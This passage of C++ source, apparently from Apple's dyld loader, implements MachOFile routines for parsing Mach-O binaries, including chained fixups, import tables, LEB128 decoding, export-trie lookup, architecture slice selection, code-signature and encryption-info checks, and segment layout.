platform"); + return false; + } + + // dylibs with interposing info cannot have dlopen closure pre-computed + if ( hasInterposingTuples() ) { + retval = false; + failureReason("has interposing tuples"); + } + + // special system dylib overrides 
cannot have closure pre-computed
    if ( strncmp(path, "/usr/lib/system/introspection/", 30) == 0 ) {
        retval = false;
        failureReason("override of OS dylib");
    }

    return retval;
}
#endif

// Returns true if the image has at least one interposing-tuple section.
// Stops scanning at the first one found.
bool MachOFile::hasInterposingTuples() const
{
    __block bool hasInterposing = false;
    Diagnostics diag;
    forEachInterposingSection(diag, ^(uint64_t vmOffset, uint64_t vmSize, bool &stop) {
        hasInterposing = true;
        stop = true;
    });
    return hasInterposing;
}

// Returns true (and the encrypted file range via textOffset/size) when an
// LC_ENCRYPTION_INFO[_64] command is present with cryptid == 1.
// On failure both out-params are zeroed.
bool MachOFile::isFairPlayEncrypted(uint32_t& textOffset, uint32_t& size) const
{
    if ( const encryption_info_command* encCmd = findFairPlayEncryptionLoadCommand() ) {
        if ( encCmd->cryptid == 1 ) {
            // Note: cryptid is 0 in just-built apps. The AppStore sets cryptid to 1
            textOffset = encCmd->cryptoff;
            size       = encCmd->cryptsize;
            return true;
        }
    }
    textOffset = 0;
    size       = 0;
    return false;
}

// True when an encryption-info load command exists at all (even if cryptid is 0).
bool MachOFile::canBeFairPlayEncrypted() const
{
    return (findFairPlayEncryptionLoadCommand() != nullptr);
}

// Scans load commands for LC_ENCRYPTION_INFO or LC_ENCRYPTION_INFO_64.
// Returns nullptr when none is found or when the load commands are malformed.
const encryption_info_command* MachOFile::findFairPlayEncryptionLoadCommand() const
{
    __block const encryption_info_command* result = nullptr;
    Diagnostics diag;
    forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) {
        if ( (cmd->cmd == LC_ENCRYPTION_INFO) || (cmd->cmd == LC_ENCRYPTION_INFO_64) ) {
            result = (encryption_info_command*)cmd;
            stop = true;
        }
    });
    if ( diag.noError() )
        return result;
    else
        return nullptr;
}


// Returns true if any load command matches the given command number.
bool MachOFile::hasLoadCommand(uint32_t cmdNum) const
{
    __block bool hasLC = false;
    Diagnostics diag;
    forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) {
        if ( cmd->cmd == cmdNum ) {
            hasLC = true;
            stop = true;
        }
    });
    return hasLC;
}

// True when the image has a __DATA*,__allow_alt_plat section, marking it as
// allowed to load on an alternate platform.
bool MachOFile::allowsAlternatePlatform() const
{
    __block bool result = false;
    forEachSection(^(const SectionInfo& info, bool malformedSectionRange, bool& stop) {
        if ( (strcmp(info.sectName, "__allow_alt_plat") == 0) && (strncmp(info.segInfo.segName, "__DATA", 6) == 0) ) {
            result = true;
            stop = true;
        }
    });
    return result;
}

// Whether the image uses chained fixups (LC_DYLD_CHAINED_FIXUPS, or — for
// arm64e, which always chains — LC_DYLD_INFO_ONLY as well).
bool MachOFile::hasChainedFixups() const
{
#if SUPPORT_ARCH_arm64e
    // arm64e always uses chained fixups
    if ( (this->cputype == CPU_TYPE_ARM64) && (this->maskedCpuSubtype() == CPU_SUBTYPE_ARM64E) ) {
        // Not all binaries have fixups at all so check for the load commands
        return hasLoadCommand(LC_DYLD_INFO_ONLY) || hasLoadCommand(LC_DYLD_CHAINED_FIXUPS);
    }
#endif
    return hasLoadCommand(LC_DYLD_CHAINED_FIXUPS);
}

// Narrower check: only the explicit LC_DYLD_CHAINED_FIXUPS command.
bool MachOFile::hasChainedFixupsLoadCommand() const
{
    return hasLoadCommand(LC_DYLD_CHAINED_FIXUPS);
}

// True when fixups are expressed as dyld opcodes (LC_DYLD_INFO[_ONLY]).
bool MachOFile::hasOpcodeFixups() const
{
    return hasLoadCommand(LC_DYLD_INFO_ONLY) || hasLoadCommand(LC_DYLD_INFO) ;
}

// Returns the pointer_format of the first segment that actually has fixup
// chain pages, or 0 when no segment has chains.
uint16_t MachOFile::chainedPointerFormat(const dyld_chained_fixups_header* header)
{
    const dyld_chained_starts_in_image* startsInfo = (dyld_chained_starts_in_image*)((uint8_t*)header + header->starts_offset);
    for (uint32_t i=0; i < startsInfo->seg_count; ++i) {
        uint32_t segInfoOffset = startsInfo->seg_info_offset[i];
        // 0 offset means this segment has no fixups
        if ( segInfoOffset == 0 )
            continue;
        const dyld_chained_starts_in_segment* segInfo = (dyld_chained_starts_in_segment*)((uint8_t*)startsInfo + segInfoOffset);
        if ( segInfo->page_count != 0 )
            return segInfo->pointer_format;
    }
    return 0; // no chains (perhaps no __DATA segment)
}

// find dyld_chained_starts_in_image* in image
// if old arm64e binary, synthesize dyld_chained_starts_in_image*
void MachOFile::withChainStarts(Diagnostics& diag, const dyld_chained_fixups_header* chainHeader, void (^callback)(const dyld_chained_starts_in_image*))
{
    if ( chainHeader == nullptr ) {
        diag.error("Must pass in a chain header");
        return;
    }
    // we have a pre-computed offset into LINKEDIT for dyld_chained_starts_in_image
    callback((dyld_chained_starts_in_image*)((uint8_t*)chainHeader + chainHeader->starts_offset));
}

void
MachOFile::forEachFixupChainSegment(Diagnostics& diag, const dyld_chained_starts_in_image* starts,
                                    void (^handler)(const dyld_chained_starts_in_segment* segInfo, uint32_t segIndex, bool& stop))
{
    // Visit each segment that has fixup chains (seg_info_offset of 0 means no fixups).
    bool stopped = false;
    for (uint32_t segIndex=0; segIndex < starts->seg_count && !stopped; ++segIndex) {
        if ( starts->seg_info_offset[segIndex] == 0 )
            continue;
        const dyld_chained_starts_in_segment* segInfo = (dyld_chained_starts_in_segment*)((uint8_t*)starts + starts->seg_info_offset[segIndex]);
        handler(segInfo, segIndex, stopped);
    }
}


// Walks one fixup chain starting at `chain`, invoking `handler` on every
// fixup location. The "next" delta field and its stride depend on
// pointer_format. Returns true if the handler requested an early stop.
bool MachOFile::walkChain(Diagnostics& diag, ChainedFixupPointerOnDisk* chain, uint16_t pointer_format, bool notifyNonPointers, uint32_t max_valid_pointer,
                          void (^handler)(ChainedFixupPointerOnDisk* fixupLocation, bool& stop))
{
    const unsigned stride = ChainedFixupPointerOnDisk::strideSize(pointer_format);
    bool           stop = false;
    bool           chainEnd = false;
    while (!stop && !chainEnd) {
        // copy chain content, in case handler modifies location to final value
        ChainedFixupPointerOnDisk chainContent = *chain;
        handler(chain, stop);

        if ( !stop ) {
            switch (pointer_format) {
                case DYLD_CHAINED_PTR_ARM64E:
                case DYLD_CHAINED_PTR_ARM64E_KERNEL:
                case DYLD_CHAINED_PTR_ARM64E_USERLAND:
                case DYLD_CHAINED_PTR_ARM64E_USERLAND24:
                case DYLD_CHAINED_PTR_ARM64E_FIRMWARE:
                    if ( chainContent.arm64e.rebase.next == 0 )
                        chainEnd = true;
                    else
                        chain = (ChainedFixupPointerOnDisk*)((uint8_t*)chain + chainContent.arm64e.rebase.next*stride);
                    break;
                case DYLD_CHAINED_PTR_64:
                case DYLD_CHAINED_PTR_64_OFFSET:
                    if ( chainContent.generic64.rebase.next == 0 )
                        chainEnd = true;
                    else
                        chain = (ChainedFixupPointerOnDisk*)((uint8_t*)chain + chainContent.generic64.rebase.next*4);
                    break;
                case DYLD_CHAINED_PTR_32:
                    if ( chainContent.generic32.rebase.next == 0 )
                        chainEnd = true;
                    else {
                        chain = (ChainedFixupPointerOnDisk*)((uint8_t*)chain + chainContent.generic32.rebase.next*4);
                        // 32-bit chains can thread through values that are not
                        // real fixups; skip them unless the caller wants them.
                        if ( !notifyNonPointers ) {
                            while ( (chain->generic32.rebase.bind == 0) && (chain->generic32.rebase.target > max_valid_pointer) ) {
                                // not a real pointer, but a non-pointer co-opted into chain
                                chain = (ChainedFixupPointerOnDisk*)((uint8_t*)chain + chain->generic32.rebase.next*4);
                            }
                        }
                    }
                    break;
                case DYLD_CHAINED_PTR_64_KERNEL_CACHE:
                case DYLD_CHAINED_PTR_X86_64_KERNEL_CACHE:
                    if ( chainContent.kernel64.next == 0 )
                        chainEnd = true;
                    else
                        chain = (ChainedFixupPointerOnDisk*)((uint8_t*)chain + chainContent.kernel64.next*stride);
                    break;
                case DYLD_CHAINED_PTR_32_FIRMWARE:
                    if ( chainContent.firmware32.next == 0 )
                        chainEnd = true;
                    else
                        chain = (ChainedFixupPointerOnDisk*)((uint8_t*)chain + chainContent.firmware32.next*4);
                    break;
                default:
                    diag.error("unknown pointer format 0x%04X", pointer_format);
                    stop = true;
            }
        }
    }
    return stop;
}

// Walks every fixup chain in one segment. Pages may have a single chain start,
// or (32-bit formats) multiple starts encoded via DYLD_CHAINED_PTR_START_MULTI.
void MachOFile::forEachFixupInSegmentChains(Diagnostics& diag, const dyld_chained_starts_in_segment* segInfo,
                                            bool notifyNonPointers, uint8_t* segmentContent,
                                            void (^handler)(ChainedFixupPointerOnDisk* fixupLocation, bool& stop))
{
    bool stopped = false;
    for (uint32_t pageIndex=0; pageIndex < segInfo->page_count && !stopped; ++pageIndex) {
        uint16_t offsetInPage = segInfo->page_start[pageIndex];
        if ( offsetInPage == DYLD_CHAINED_PTR_START_NONE )
            continue;
        if ( offsetInPage & DYLD_CHAINED_PTR_START_MULTI ) {
            // 32-bit chains which may need multiple starts per page
            uint32_t overflowIndex = offsetInPage & ~DYLD_CHAINED_PTR_START_MULTI;
            bool chainEnd = false;
            while (!stopped && !chainEnd) {
                chainEnd = (segInfo->page_start[overflowIndex] & DYLD_CHAINED_PTR_START_LAST);
                offsetInPage = (segInfo->page_start[overflowIndex] & ~DYLD_CHAINED_PTR_START_LAST);
                uint8_t* pageContentStart = segmentContent + (pageIndex * segInfo->page_size);
                ChainedFixupPointerOnDisk* chain = (ChainedFixupPointerOnDisk*)(pageContentStart+offsetInPage);
                stopped = walkChain(diag, chain, segInfo->pointer_format, notifyNonPointers, segInfo->max_valid_pointer, handler);
                ++overflowIndex;
            }
        }
        else {
            // one chain per page
            uint8_t* pageContentStart = segmentContent + (pageIndex * segInfo->page_size);
            ChainedFixupPointerOnDisk* chain = (ChainedFixupPointerOnDisk*)(pageContentStart+offsetInPage);
            stopped = walkChain(diag, chain, segInfo->pointer_format, notifyNonPointers, segInfo->max_valid_pointer, handler);
        }
    }
}

// Enumerates the import (bind target) table of a chained-fixups blob.
// Supports all three import record formats; name offsets are bounds-checked
// against the LINKEDIT blob size. Negative lib ordinals (special values) are
// encoded as large unsigned values and sign-extended here.
void MachOFile::forEachChainedFixupTarget(Diagnostics& diag, const dyld_chained_fixups_header* header,
                                          const linkedit_data_command* chainedFixups,
                                          void (^callback)(int libOrdinal, const char* symbolName, uint64_t addend, bool weakImport, bool& stop))
{
    if ( (header->imports_offset > chainedFixups->datasize) || (header->symbols_offset > chainedFixups->datasize) ) {
        diag.error("malformed import table");
        return;
    }

    bool stop    = false;

    const dyld_chained_import*          imports;
    const dyld_chained_import_addend*   importsA32;
    const dyld_chained_import_addend64* importsA64;
    const char*                         symbolsPool     = (char*)header + header->symbols_offset;
    uint32_t                            maxSymbolOffset = chainedFixups->datasize - header->symbols_offset;
    int                                 libOrdinal;
    switch (header->imports_format) {
        case DYLD_CHAINED_IMPORT:
            imports = (dyld_chained_import*)((uint8_t*)header + header->imports_offset);
            for (uint32_t i=0; i < header->imports_count && !stop; ++i) {
                const char* symbolName = &symbolsPool[imports[i].name_offset];
                if ( imports[i].name_offset > maxSymbolOffset ) {
                    diag.error("malformed import table, string overflow");
                    return;
                }
                uint8_t libVal = imports[i].lib_ordinal;
                if ( libVal > 0xF0 )
                    libOrdinal = (int8_t)libVal;
                else
                    libOrdinal = libVal;
                callback(libOrdinal, symbolName, 0, imports[i].weak_import, stop);
                if ( stop )
                    return;
            }
            break;
        case DYLD_CHAINED_IMPORT_ADDEND:
            importsA32 = (dyld_chained_import_addend*)((uint8_t*)header + header->imports_offset);
            for (uint32_t i=0; i < header->imports_count && !stop; ++i) {
                const char* symbolName = &symbolsPool[importsA32[i].name_offset];
                if ( importsA32[i].name_offset > maxSymbolOffset ) {
                    diag.error("malformed import table, string overflow");
                    return;
                }
                uint8_t libVal = importsA32[i].lib_ordinal;
                if ( libVal > 0xF0 )
                    libOrdinal = (int8_t)libVal;
                else
                    libOrdinal = libVal;
                callback(libOrdinal, symbolName, importsA32[i].addend, importsA32[i].weak_import, stop);
                if ( stop )
                    return;
            }
            break;
        case DYLD_CHAINED_IMPORT_ADDEND64:
            importsA64 = (dyld_chained_import_addend64*)((uint8_t*)header + header->imports_offset);
            for (uint32_t i=0; i < header->imports_count && !stop; ++i) {
                const char* symbolName = &symbolsPool[importsA64[i].name_offset];
                if ( importsA64[i].name_offset > maxSymbolOffset ) {
                    diag.error("malformed import table, string overflow");
                    return;
                }
                uint16_t libVal = importsA64[i].lib_ordinal;
                if ( libVal > 0xFFF0 )
                    libOrdinal = (int16_t)libVal;
                else
                    libOrdinal = libVal;
                callback(libOrdinal, symbolName, importsA64[i].addend, importsA64[i].weak_import, stop);
                if ( stop )
                    return;
            }
            break;
        default:
            diag.error("unknown imports format");
            return;
    }
}

// Decodes a ULEB128 value, advancing `p`. Sets a diag error (and stops early)
// on truncation or a value wider than 64 bits.
uint64_t MachOFile::read_uleb128(Diagnostics& diag, const uint8_t*& p, const uint8_t* end)
{
    uint64_t result = 0;
    int      bit = 0;
    do {
        if ( p == end ) {
            diag.error("malformed uleb128");
            break;
        }
        uint64_t slice = *p & 0x7f;

        if ( bit > 63 ) {
            diag.error("uleb128 too big for uint64");
            break;
        }
        else {
            result |= (slice << bit);
            bit += 7;
        }
    }
    while (*p++ & 0x80);
    return result;
}


// Decodes a SLEB128 value, advancing `p`. Sets a diag error on truncation.
int64_t MachOFile::read_sleb128(Diagnostics& diag, const uint8_t*& p, const uint8_t* end)
{
    int64_t  result = 0;
    int      bit = 0;
    uint8_t  byte = 0;
    do {
        if ( p == end ) {
            diag.error("malformed sleb128");
            break;
        }
        byte = *p++;
        result |= (((int64_t)(byte & 0x7f)) << bit);
        bit += 7;
    } while (byte & 0x80);
    // sign extend negative numbers
    if ( ((byte & 0x40) != 0) && (bit < 64) )
        result |= (~0ULL)
<< bit;
    return result;
}

// Builds a "'arch1' or 'arch2'" list of the arch names in `archs` into buffer
// (fixed 256-byte buffer, strlcat-truncated).
static void getArchNames(const GradedArchs& archs, bool isOSBinary, char buffer[256])
{
    buffer[0] = '\0';
    archs.forEachArch(isOSBinary, ^(const char* archName) {
        if ( buffer[0] != '\0' )
            strlcat(buffer, "' or '", 256);
        strlcat(buffer, archName, 256);
    });
}

// Finds the best mach-o slice in `fileContent` (thin or fat) that is a valid
// mach-o, an acceptable architecture per `archs`, and loadable for `platform`.
// Returns nullptr with a diag error describing the first failed check.
const MachOFile* MachOFile::compatibleSlice(Diagnostics& diag, const void* fileContent, size_t contentSize, const char* path, Platform platform, bool isOSBinary, const GradedArchs& archs, bool internalInstall)
{
    const MachOFile* mf = nullptr;
    if ( const dyld3::FatFile* ff = dyld3::FatFile::isFatFile(fileContent) ) {
        uint64_t sliceOffset;
        uint64_t sliceLen;
        bool     missingSlice;
        if ( ff->isFatFileWithSlice(diag, contentSize, archs, isOSBinary, sliceOffset, sliceLen, missingSlice) ) {
            mf = (MachOFile*)((long)fileContent + sliceOffset);
        }
        else {
            BLOCK_ACCCESSIBLE_ARRAY(char, gradedArchsBuf, 256);
            getArchNames(archs, isOSBinary, gradedArchsBuf);

            char strBuf[256];
            diag.error("fat file, but missing compatible architecture (have '%s', need '%s')", ff->archNames(strBuf, contentSize), gradedArchsBuf);
            return nullptr;
        }
    }
    else {
        // not fat: the file content is the (candidate) mach-o itself
        mf = (MachOFile*)fileContent;
    }

    if ( !mf->hasMachOMagic() || !mf->isMachO(diag, contentSize) ) {
        if ( diag.noError() )
            diag.error("not a mach-o file");
        return nullptr;
    }

    if ( archs.grade(mf->cputype, mf->cpusubtype, isOSBinary) == 0 ) {
        BLOCK_ACCCESSIBLE_ARRAY(char, gradedArchsBuf, 256);
        getArchNames(archs, isOSBinary, gradedArchsBuf);
        diag.error("mach-o file, but is an incompatible architecture (have '%s', need '%s')", mf->archName(), gradedArchsBuf);
        return nullptr;
    }

    if ( !mf->loadableIntoProcess(platform, path, internalInstall) ) {
        __block Platform havePlatform = Platform::unknown;
        mf->forEachSupportedPlatform(^(Platform aPlat, uint32_t minOS, uint32_t sdk) {
            havePlatform = aPlat;
        });
        diag.error("mach-o file (%s), but incompatible platform (have '%s', need '%s')", path, MachOFile::platformName(havePlatform), MachOFile::platformName(platform));
        return nullptr;
    }

    return mf;
}

// Looks up `symbol` in an export trie spanning [start,end). Returns a pointer
// to the terminal payload for the symbol, or nullptr if not found/malformed.
// Tracks visited node offsets to reject cyclic (malicious) tries.
const uint8_t* MachOFile::trieWalk(Diagnostics& diag, const uint8_t* start, const uint8_t* end, const char* symbol)
{
    STACK_ALLOC_OVERFLOW_SAFE_ARRAY(uint32_t, visitedNodeOffsets, 128);
    visitedNodeOffsets.push_back(0);
    const uint8_t* p = start;
    while ( p < end ) {
        uint64_t terminalSize = *p++;
        if ( terminalSize > 127 ) {
            // except for re-export-with-rename, all terminal sizes fit in one byte
            --p;
            terminalSize = read_uleb128(diag, p, end);
            if ( diag.hasError() )
                return nullptr;
        }
        if ( (*symbol == '\0') && (terminalSize != 0) ) {
            return p;
        }
        const uint8_t* children = p + terminalSize;
        if ( children > end ) {
            //diag.error("malformed trie node, terminalSize=0x%llX extends past end of trie\n", terminalSize);
            return nullptr;
        }
        uint8_t childrenRemaining = *children++;
        p = children;
        uint64_t nodeOffset = 0;
        for (; childrenRemaining > 0; --childrenRemaining) {
            const char* ss = symbol;
            bool wrongEdge = false;
            // scan whole edge to get to next edge
            // if edge is longer than target symbol name, don't read past end of symbol name
            char c = *p;
            while ( c != '\0' ) {
                if ( !wrongEdge ) {
                    if ( c != *ss )
                        wrongEdge = true;
                    ++ss;
                }
                ++p;
                c = *p;
            }
            if ( wrongEdge ) {
                // advance to next child
                ++p; // skip over zero terminator
                // skip over uleb128 until last byte is found
                while ( (*p & 0x80) != 0 )
                    ++p;
                ++p; // skip over last byte of uleb128
                if ( p > end ) {
                    diag.error("malformed trie node, child node extends past end of trie\n");
                    return nullptr;
                }
            }
            else {
                // the symbol so far matches this edge (child)
                // so advance to the child's node
                ++p;
                nodeOffset = read_uleb128(diag, p, end);
                if ( diag.hasError() )
                    return nullptr;
                if ( (nodeOffset == 0) || ( &start[nodeOffset] > end) ) {
                    diag.error("malformed trie child, nodeOffset=0x%llX out of range\n", nodeOffset);
                    return nullptr;
                }
                symbol = ss;
                break;
            }
        }
        if ( nodeOffset != 0 ) {
            if ( nodeOffset > (uint64_t)(end-start) ) {
               diag.error("malformed trie child, nodeOffset=0x%llX out of range\n", nodeOffset);
               return nullptr;
            }
            // check for cycles
            for (uint32_t aVisitedNodeOffset : visitedNodeOffsets) {
                if ( aVisitedNodeOffset == nodeOffset ) {
                    diag.error("malformed trie child, cycle to nodeOffset=0x%llX\n", nodeOffset);
                    return nullptr;
                }
            }
            visitedNodeOffsets.push_back((uint32_t)nodeOffset);
            p = &start[nodeOffset];
        }
        else
            p = end;
    }
    return nullptr;
}

// Invokes the callback once per LC_RPATH load command with the rpath string.
void MachOFile::forEachRPath(void (^callback)(const char* rPath, bool& stop)) const
{
    Diagnostics diag;
    forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) {
        if ( cmd->cmd == LC_RPATH ) {
            const char* rpath = (char*)cmd + ((struct rpath_command*)cmd)->path.offset;
            callback(rpath, stop);
        }
    });
    diag.assertNoError();   // any malformations in the file should have been caught by earlier validate() call
}


// Returns true if runtimeOffset falls in a section flagged as containing
// instructions. Only meaningful (non-false) for arm64e images.
bool MachOFile::inCodeSection(uint32_t runtimeOffset) const
{
    // only needed for arm64e code to know to sign pointers
    if ( (this->cputype != CPU_TYPE_ARM64) || (this->maskedCpuSubtype() != CPU_SUBTYPE_ARM64E) )
        return false;

    __block bool result = false;
    uint64_t baseAddress = this->preferredLoadAddress();
    this->forEachSection(^(const SectionInfo& sectInfo, bool malformedSectionRange, bool& stop) {
        if ( ((sectInfo.sectAddr-baseAddress) <= runtimeOffset) && (runtimeOffset < (sectInfo.sectAddr+sectInfo.sectSize-baseAddress)) ) {
            result = ( (sectInfo.sectFlags & S_ATTR_PURE_INSTRUCTIONS) || (sectInfo.sectFlags & S_ATTR_SOME_INSTRUCTIONS) );
            stop = true;
        }
    });
    return result;
}

// Counts dependent dylibs; optionally reports whether all are plain
// (non-weak, non-reexport, non-upward) dependencies.
uint32_t MachOFile::dependentDylibCount(bool* allDepsAreNormalPtr) const
{
    __block uint32_t count = 0;
    __block bool allDepsAreNormal = true;
    forEachDependentDylib(^(const char* loadPath, bool isWeak, bool isReExport, bool isUpward,
uint32_t compatVersion, uint32_t curVersion, bool& stop) {
        ++count;
        if ( isWeak || isReExport || isUpward )
            allDepsAreNormal = false;
    });

    if ( allDepsAreNormalPtr != nullptr )
        *allDepsAreNormalPtr = allDepsAreNormal;
    return count;
}

// True when the image has ObjC classes/categories with a +load method, which
// the compiler records in the __objc_nlclslist / __objc_nlcatlist sections.
bool MachOFile::hasPlusLoadMethod(Diagnostics& diag) const
{
    __block bool result = false;

    // in new objc runtime compiler puts classes/categories with +load method in specical section
    forEachSection(^(const SectionInfo& info, bool malformedSectionRange, bool& stop) {
        if ( strncmp(info.segInfo.segName, "__DATA", 6) != 0 )
            return;
        if ( (strcmp(info.sectName, "__objc_nlclslist") == 0) || (strcmp(info.sectName, "__objc_nlcatlist") == 0)) {
            result = true;
            stop = true;
        }
    });
    return result;
}

// Returns the file offset of the fixups load command (LC_DYLD_INFO[_ONLY] or
// LC_DYLD_CHAINED_FIXUPS), or 0 if none / malformed. Note: does not stop at
// the first match, so the last matching command wins if several exist.
uint32_t MachOFile::getFixupsLoadCommandFileOffset() const
{
    Diagnostics diag;
    __block uint32_t fileOffset = 0;
    this->forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) {
        switch ( cmd->cmd ) {
            case LC_DYLD_INFO:
            case LC_DYLD_INFO_ONLY:
                fileOffset = (uint32_t)( (uint8_t*)cmd - (uint8_t*)this );
                break;
            case LC_DYLD_CHAINED_FIXUPS:
                fileOffset = (uint32_t)( (uint8_t*)cmd - (uint8_t*)this );
                break;
        }
    });
    if ( diag.hasError() )
        return 0;

    return fileOffset;
}

// True when the image has any initializer: LC_ROUTINES[_64], a mod-init
// pointer section, or an S_INIT_FUNC_OFFSETS section.
bool MachOFile::hasInitializer(Diagnostics& diag) const
{
    __block bool result = false;

    // if dylib linked with -init linker option, that initializer is first
    forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) {
        if ( (cmd->cmd == LC_ROUTINES) || (cmd->cmd == LC_ROUTINES_64) ) {
            result = true;
            stop = true;
        }
    });

    if ( result )
        return true;

    // next any function pointers in mod-init section
    forEachInitializerPointerSection(diag, ^(uint32_t sectionOffset, uint32_t sectionSize, bool& stop) {
        result = true;
        stop = true;
    });

    if ( result )
        return true;

    forEachSection(^(const SectionInfo& info, bool malformedSectionRange, bool& stop) {
        if ( (info.sectFlags & SECTION_TYPE) != S_INIT_FUNC_OFFSETS )
            return;
        result = true;
        stop = true;
    });

    return result;
}

// Invokes the callback for each S_MOD_INIT_FUNC_POINTERS section, after
// validating size multiple-of-pointer, in-segment range, and alignment.
// Reports the section as (offset-from-base-address, size).
void MachOFile::forEachInitializerPointerSection(Diagnostics& diag, void (^callback)(uint32_t sectionOffset, uint32_t sectionSize, bool& stop)) const
{
    const unsigned ptrSize     = pointerSize();
    const uint64_t baseAddress = preferredLoadAddress();
    forEachSection(^(const SectionInfo& info, bool malformedSectionRange, bool& sectStop) {
        if ( (info.sectFlags & SECTION_TYPE) == S_MOD_INIT_FUNC_POINTERS ) {
            if ( (info.sectSize % ptrSize) != 0 ) {
                diag.error("initializer section %s/%s has bad size", info.segInfo.segName, info.sectName);
                sectStop = true;
                return;
            }
            if ( malformedSectionRange ) {
                diag.error("initializer section %s/%s extends beyond its segment", info.segInfo.segName, info.sectName);
                sectStop = true;
                return;
            }
            if ( (info.sectAddr % ptrSize) != 0 ) {
                diag.error("initializer section %s/%s is not pointer aligned", info.segInfo.segName, info.sectName);
                sectStop = true;
                return;
            }
            callback((uint32_t)(info.sectAddr - baseAddress), (uint32_t)info.sectSize, sectStop);
        }
    });
}

// Simple presence check for LC_CODE_SIGNATURE.
bool MachOFile::hasCodeSignature() const
{
    return this->hasLoadCommand(LC_CODE_SIGNATURE);
}

// Returns true plus the signature blob's file range when the image has a
// usable code signature. Signatures in pre-10.9 macOS binaries are ignored.
bool MachOFile::hasCodeSignature(uint32_t& fileOffset, uint32_t& size) const
{
    fileOffset = 0;
    size = 0;

    Diagnostics diag;
    forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) {
        if ( cmd->cmd == LC_CODE_SIGNATURE ) {
            const linkedit_data_command* sigCmd = (linkedit_data_command*)cmd;
            fileOffset = sigCmd->dataoff;
            size       = sigCmd->datasize;
            stop = true;
        }
    });
    diag.assertNoError();   // any malformations in the file should have been caught by earlier validate() call

    // early exist if no LC_CODE_SIGNATURE
    if ( fileOffset == 0 )
        return false;

    // ignore code signatures in macOS binaries built with pre-10.9 tools
    if ( (this->cputype == CPU_TYPE_X86_64) || (this->cputype == CPU_TYPE_I386) ) {
        __block
bool foundPlatform = false;
        __block bool badSignature  = false;
        forEachSupportedPlatform(^(Platform platform, uint32_t minOS, uint32_t sdk) {
            foundPlatform = true;
            if ( (platform == Platform::macOS) && (sdk < 0x000A0900) )
                badSignature = true;
        });
        return foundPlatform && !badSignature;
    }

    return true;
}

// Total VM space the image occupies when mapped (page-rounded).
uint64_t MachOFile::mappedSize() const
{
    uint64_t vmSpace;
    bool     hasZeroFill;
    analyzeSegmentsLayout(vmSpace, hasZeroFill);
    return vmSpace;
}

// Computes total VM span of all segments (excluding __PAGEZERO) and whether
// mapping needs zero-fill handling: zerofill tails on writable segments,
// zero-sized segments, gaps between segments, or out-of-order segments.
void MachOFile::analyzeSegmentsLayout(uint64_t& vmSpace, bool& hasZeroFill) const
{
    __block bool     writeExpansion = false;
    __block uint64_t lowestVmAddr   = 0xFFFFFFFFFFFFFFFFULL;
    __block uint64_t highestVmAddr  = 0;
    __block uint64_t sumVmSizes     = 0;
    forEachSegment(^(const SegmentInfo& segmentInfo, bool& stop) {
        if ( strcmp(segmentInfo.segName, "__PAGEZERO") == 0 )
            return;
        if ( segmentInfo.writable() && (segmentInfo.fileSize !=  segmentInfo.vmSize) )
            writeExpansion = true; // zerofill at end of __DATA
        if ( segmentInfo.vmSize == 0 ) {
            // Always zero fill if we have zero-sized segments
            writeExpansion = true;
        }
        if ( segmentInfo.vmAddr < lowestVmAddr )
            lowestVmAddr = segmentInfo.vmAddr;
        if ( segmentInfo.vmAddr+segmentInfo.vmSize > highestVmAddr )
            highestVmAddr = segmentInfo.vmAddr+segmentInfo.vmSize;
        sumVmSizes += segmentInfo.vmSize;
    });
    uint64_t totalVmSpace = (highestVmAddr - lowestVmAddr);
    // LINKEDIT vmSize is not required to be a multiple of page size.  Round up if that is the case
    const uint64_t pageSize = uses16KPages() ? 0x4000 : 0x1000;
    totalVmSpace = (totalVmSpace + (pageSize - 1)) & ~(pageSize - 1);
    bool hasHole = (totalVmSpace != sumVmSizes); // segments not contiguous

    // The aux KC may have __DATA first, in which case we always want to vm_copy to the right place
    bool hasOutOfOrderSegments = false;
#if BUILDING_APP_CACHE_UTIL
    uint64_t textSegVMAddr = preferredLoadAddress();
    hasOutOfOrderSegments = textSegVMAddr != lowestVmAddr;
#endif

    vmSpace     = totalVmSpace;
    hasZeroFill = writeExpansion || hasHole || hasOutOfOrderSegments;
}

// Number of segment load commands in the image.
uint32_t MachOFile::segmentCount() const
{
    __block uint32_t count   = 0;
    forEachSegment(^(const SegmentInfo& info, bool& stop) {
        ++count;
    });
    return count;
}


// Invokes the callback for each well-formed DTrace DOF section with its
// offset from the start of its segment.
void MachOFile::forEachDOFSection(Diagnostics& diag, void (^callback)(uint32_t offset)) const
{
    forEachSection(^(const SectionInfo& info, bool malformedSectionRange, bool &stop) {
        if ( ( (info.sectFlags & SECTION_TYPE) == S_DTRACE_DOF ) && !malformedSectionRange ) {
            callback((uint32_t)(info.sectAddr - info.segInfo.vmAddr));
        }
    });
}

// Locates the export trie (LC_DYLD_EXPORTS_TRIE, or the export range of
// LC_DYLD_INFO[_ONLY]) and converts its file offset into a runtime offset
// from the start of __TEXT via the __LINKEDIT segment mapping.
bool MachOFile::hasExportTrie(uint32_t& runtimeOffset, uint32_t& size) const
{
    __block uint64_t textUnslidVMAddr     = 0;
    __block uint64_t linkeditUnslidVMAddr = 0;
    __block uint64_t linkeditFileOffset   = 0;
    forEachSegment(^(const SegmentInfo& info, bool& stop) {
        if ( strcmp(info.segName, "__TEXT") == 0 ) {
            textUnslidVMAddr = info.vmAddr;
        } else if ( strcmp(info.segName, "__LINKEDIT") == 0 ) {
            linkeditUnslidVMAddr = info.vmAddr;
            linkeditFileOffset   = info.fileOffset;
            stop = true;
        }
    });

    Diagnostics diag;
    __block uint32_t fileOffset = ~0U;
    this->forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) {
        switch ( cmd->cmd ) {
            case LC_DYLD_INFO:
            case LC_DYLD_INFO_ONLY: {
                const auto* dyldInfo = (const dyld_info_command*)cmd;
                fileOffset = dyldInfo->export_off;
                size       = dyldInfo->export_size;
                break;
            }
            case LC_DYLD_EXPORTS_TRIE: {
                const auto* linkeditCmd = (const linkedit_data_command*)cmd;
                fileOffset = linkeditCmd->dataoff;
                size       = linkeditCmd->datasize;
                break;
            }
        }
    });
    if ( diag.hasError() )
        return false;

    if ( fileOffset == ~0U )
        return false;

    runtimeOffset = (uint32_t)((fileOffset - linkeditFileOffset) + (linkeditUnslidVMAddr - textUnslidVMAddr));
    return true;
}

#if !TARGET_OS_EXCLAVEKIT
